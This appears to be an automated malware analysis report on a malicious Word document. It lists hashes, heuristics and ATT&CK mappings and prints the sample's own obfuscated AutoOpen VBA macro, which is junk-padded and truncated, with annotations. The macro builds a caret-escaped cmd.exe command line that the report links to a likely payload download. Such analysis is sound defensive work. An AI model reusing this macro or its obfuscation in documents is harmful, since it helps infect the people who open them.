Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6002ff9f85192b6…

MALICIOUS

Office (OLE)

87.5 KB First seen: 2019-04-18
MD5: 12e3034e10282bce9be36590f935ab13 SHA-1: dce29bec809cfcf4caece66b2a9e2e6ac1a1ca0c SHA-256: c6002ff9f85192b68c13b817be4f005f1564446a865b22de7ae53a892dcab4d8
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document with a high slack anomaly and detected VBA macros, including an AutoOpen macro. The AutoOpen macro contains heavily obfuscated VBA code, and the extracted source shown below is truncated, making it difficult to determine the exact functionality. Most of the visible code is padding: conditionals over identifiers that are never assigned, whose bodies declare arrays that are never read. The one call that matters passes a string assembled from KeyString() calls and the return value of Rcqwkifssjf(), which itself concatenates literals beginning `d /V/C` with caret (`^`) characters interleaved — a pattern consistent with a cmd.exe command line escaped to defeat plain string matching. The presence of an AutoOpen macro therefore strongly suggests an attempt to automatically execute malicious code upon opening the document, likely to download and execute a second-stage payload. The single embedded URL (an OOXML schema namespace string found in the document body, see the heuristics below) was confirmed benign and is not considered a threat.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 89,604 bytes but its declared streams total only 32,603 bytes — 57,001 bytes (64%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    An AutoOpen macro is present; Word runs it automatically when the document is opened (subject to the host's macro security setting).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17607 bytes
SHA-256: 64d4b3b028fedf4ffbd8326cfd2b0a5c7aacdea641996b423c26b334577f726a
Preview script
First 1,000 lines of the extracted script
' Module attribute directives emitted with the decoded VBA source.
' VB_Name is the module's name — random-looking, like every identifier
' in this sample. VB_Base = "1Normal.ThisDocument" together with
' VB_PredeclaredId = True indicates a document module derived from
' ThisDocument (the Normal template), i.e. the module that hosts AutoOpen.
Attribute VB_Name = "OGbjBav"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' AutoOpen: Word runs this automatically when the document is opened
' (flagged OLE_VBA_AUTOOPEN above).
'
' Analyst reading of the body:
'   * Every If block compares identifiers that are never assigned anywhere
'     in the visible preview, and only declares an array and fills one or
'     two slots with sums of other never-assigned identifiers. Nothing
'     ever reads those arrays. This looks like junk-code padding inserted
'     to inflate the macro and to break signature matching; the conditions
'     are immaterial to what the macro does.
'   * The single statement with an external effect is the call to
'     idObcYficmU (not defined in the preview) in the middle of the Sub.
Sub AutoOpen()
   If uTvXJH <= bzSWO Then

Dim SAlvlj(1)
SAlvlj(0) = iaHbc + dwflDU

End If
   If iuDJAt Xor UtHit Then

Dim qzHcD(2)
qzHcD(0) = cZBPj + UhbYYi
qzHcD(1) = uqGMcN + WrTlG + bfazwF + UuXhfT

End If
   If wAmQKn And EnzZpi Then

Dim jcMAA(1)
jcMAA(0) = XdGfhR + oHfXVQ + oiNcU + RvFiBt

End If
   If MhwUct <> KklfPi Then

Dim kFQIp(1)
kFQIp(0) = oHiaS + UzSZjI + oKJXQd + dVpMS

End If
   If jjhvwM Eqv LdGjV Then

Dim XWpGQT(1)
XWpGQT(0) = EivhWJ + niAtfU + AsiaiB + PXQKB

End If
   If SKSQW > ZrFDWC Then

Dim ZwsLEX(2)
ZwsLEX(0) = trahzi + aTRRHb
ZwsLEX(1) = BpzIK + JzFFBN

End If
' The only meaningful statement: idObcYficmU is invoked as a statement
' with one parenthesised argument. That argument is a concatenation of
'   - two KeyString(...) calls (KeyString is not defined in the preview;
'     its arguments are sums of unassigned identifiers plus small integer
'     constants — presumably an index or key into some decoder, TODO confirm),
'   - Rcqwkifssjf, the Function defined further down in module PnzfATN,
'     which returns a string of concatenated literals beginning "d /V/C"
'     with caret (^) characters interleaved, and
'   - a run of further unassigned identifiers (empty in VBA) that pad the string.
' The caret-interleaved fragments are the detection-relevant content of
' this macro; what idObcYficmU does with the assembled string cannot be
' determined from the preview.
idObcYficmU (KeyString(zcPODV + zdXLfOVG + 4 + 2 + 61 + iwUMT + iLwOPB) + wAJfWfqb + wFczh + KeyString(fSZtznI + ZJGhkbQW + 5 + 2 + 70 + LaAWrW + Vpsjd) + Rcqwkifssjf + ajUVm + NiSMlvONrC + FmkwGBCLi + ohVMb + jhKQaKQY + TPmwRQ + utswta + IhaKMiz + DdDcVOJ + dhuInE + ciIvLUa + QrpwYom)
   If FCUjaO = pYoOD Then

Dim vaChAd(2)
vaChAd(0) = KfzDi + aDKXV + uwrLb + MuIaZ
vaChAd(1) = rKNXOI + QpicZF

End If
   If dYJtDt > VwmUjm Then

Dim OwqnIL(1)
OwqnIL(0) = zaFOr + pLYRT

End If
End Sub


Attribute VB_Name = "PnzfATN"
Function Rcqwkifssjf()
If MvOmAQ Or ZdfHF Then

Dim UfAUAF(1)
UfAUAF(0) = ErDMj + hjYFXw + BLfwwJ + cnbZIw

End If
   If boznS Or 6 Then

Dim qTEOz(1)
qTEOz(0) = Ulfdb + mHKROJ

End If
   If oAJJbc > 8 Then

Dim UsCGSj(2)
UsCGSj(0) = BXIIS + IADVrK
UsCGSj(1) = QQiEhz + rXvNWK + rmusq + ElEQz

End If
   If GLGKQu = 6 Then

Dim wIbkz(1)
wIbkz(0) = AZjhii + YbLlKL + NEFPEO + UBiJj

End If
KafFWP = "d /V/C" + """" + "^s^e^t ^t^w" + "^Z^x=^yv^a^ /^f" + "^s^ ^I^8^f" + "^ z^q^&^ ^P^f^S" + "^ N^E^2^ ^"
wVWIvB = "`^\N ^D^5^" + "m^ L^Z^d^ ^Tn^" + "_^ v^D%^ ^'^k^]^ ^7^" + "o^=^ ^*^+^e^ %n,^ ^$"
XmjpFtzC = "^3^w^ ^H^*^-^ ^lc" + "^5^}^b^X)^}^?^.^" + "=^{^5^T^Q^h%^\" + "Rc^4^Z^~^t5C^&^a(" + "^S^?c^?^D^" + "@^}n^e^K^;^A^"
If zJanK > SIosA Then

Dim YhObDT(2)
YhObDT(0) = jmLdpM + iYIWi + sboMdm + cnMKuX
YhObDT(1) = voLzF + Xjmoj

End If
   If zotARJ >= 4 Then

Dim AwtCw(2)
AwtCw(0) = VWsaB + RIPpNK + ZTLoz + sLzouL
AwtCw(1) = kODwvJ + ooBoMn + SSkwjp + kqpHtV

End If
   If hiLNFA And 14 Then

Dim WDaIvF(1)
WDaIvF(0) = wnYwT + aZIcW

End If
iotXUQ = "TC^k^J^i^3^a^,^z" + "^?^e^3C^Ar^K^8Z^b(" + "Y^7^;^2^6n"
If isZsQS = 4 Then

Dim Uzjdhm(2)
Uzjdhm(0) = jtmlr + AAvLV + NXGcG + QwkUu
Uzjdhm(1) = MMcfa + BwzVfQ + wBrzi + OXOEWN

End If
   If RdaVw < EnFALL Then

Dim YwSUso(1)
YwSUso(0) = pTnbX + DUzjor + ZXuhib + Bkaml

End If
   If YRnZM <> 9 Then

Dim bYfuUZ(1)
bYfuUZ(0) = JWCss + YHEYzF + fnzHF + FMdhL

End If
   If hzOHw <> FQuDL Then

Dim lRWcMk(2)
lRWcMk(0) = tNqNV + zYNqBn + jQUqwf + PMUDci
lRWcMk(1) = zYSfj + fLKrks

End If
   If sItIpX <= dwqwwH Then

Dim kpZMUO(2)
kpZMUO(0) = AClmQ + SEtAp + OKLDXz + UwZEi
kpZMUO(1) = UuQuAa + hVrGI + YEKYE + IXsQYl

End If
NjCCc = "^L^|^}^2^u^snx^W^+^t" + "^L^$8^J^L^ R^3^W^" + "m^b^S^s^e^d" + "^{^jt^3^L^.^I^H"
If FUcfI Xor MQkiz Then

Dim TqBmkk(2)
TqBmkk(0) = HkcqUt + BuMHG
TqBmkk(1) = Czpjwk + JHzph

End If
   If zkbDEu = 15 Then

Dim MCqwE(2)
MCqwE(0) = qsMKKm + SamhU
MCqwE(1) = IlqUP + MdUTB + NAznS + AdiJua

End If
   If YSwbjC > IYddHl Then

Dim MREcXS(1)
MREcXS(0) = WAVozi + zmnIsM

End If
   If uIbwC Eqv 16 Then

Dim wYBKs(1)
wYBKs(0) = YttSF + AaQKXU + ZLbir + wNQnM

End If
   If aiQWwt Or DlnWib Then

Dim rSWZLq(2)
rSWZLq(0) = lFiIpj + WwqPWj
rSWZLq(1) = dMzVHl + OJQkW

End If
XzrijY = "^4^O^-^x^O^~^e" + "^h^\^~k^>^A^*^o/^" + "X^{v^5^s^[n("
Rcqwkifssjf = KafFWP + wVWIvB + XmjpFtzC + iotXUQ + NjCCc + XzrijY
   If bMJYbz Or FORMC Then

Dim SiYrq(2)
SiYrq(0) = nVcaG + zTNfqq + MIviD + qIiGwE
SiYrq(1) = LuqRCr + oFIwl + bcdLa + aDqrW

End I
... (truncated)